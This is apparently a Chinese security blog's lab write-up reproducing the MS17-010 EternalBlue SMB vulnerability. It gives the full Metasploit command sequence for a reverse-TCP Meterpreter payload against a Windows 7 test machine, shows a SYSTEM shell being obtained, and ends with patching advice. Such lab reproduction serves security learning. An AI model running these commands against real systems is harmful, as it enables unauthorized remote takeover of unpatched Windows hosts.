【MS17-010】永恒之蓝漏洞复现

漏洞描述

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

影响版本

目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

漏洞原理代码详解

http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772
https://blog.csdn.net/qq_27446553/article/details/73480807

漏洞复现

攻击机:kali-Linux-2019 192.168.141.133
靶机:Windows7 x64 192.168.141.136

我们可以利用kali-msf框架里收录的永恒之蓝漏洞环境来复现这个漏洞
命令打开工具:

msfconsole

图片
上面显示的是漏洞利用数和执行语句数量,接下来选择永恒之蓝的模块

search ms17_010

图片
有如上几种漏洞利用,我们就选择其中一种

use exploit/windows/smb/ms17_010_eternalblue

图片
然后查看一下有哪些利用语句(payload)

show payloads

图片
我们选择其中一种执行语句

set payload windows/x64/meterpreter/reverse_tcp

图片
查看一下当前漏洞利用信息

show options

图片
现在使用的这个漏洞利用是有反弹shell的攻击,RHOSTS就是靶机的ip地址,LHOST是反弹的地址,也就是我们的攻击机ip,把信息对应填入

set RHOSTS 192.168.141.136
set LHOST 192.168.141.133

图片
图片
设置完成再检测一下当前漏洞利用信息

show options

图片
检测无误后执行漏洞

exploit

图片
有以上显示即为攻击成功
输入shell,显示获取shell成功
图片
拥有system最高权限
图片
尝试截图
Screenshot
图片
图片
图片

漏洞修复

①在线更新;开启Windows Update更新。
②打补丁;此漏洞对应的微软补丁地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010

  • Copyrights © 2019-2022 DMKXY
  • Visitors: | Views:

欢迎师傅来交流对线~

支付宝
微信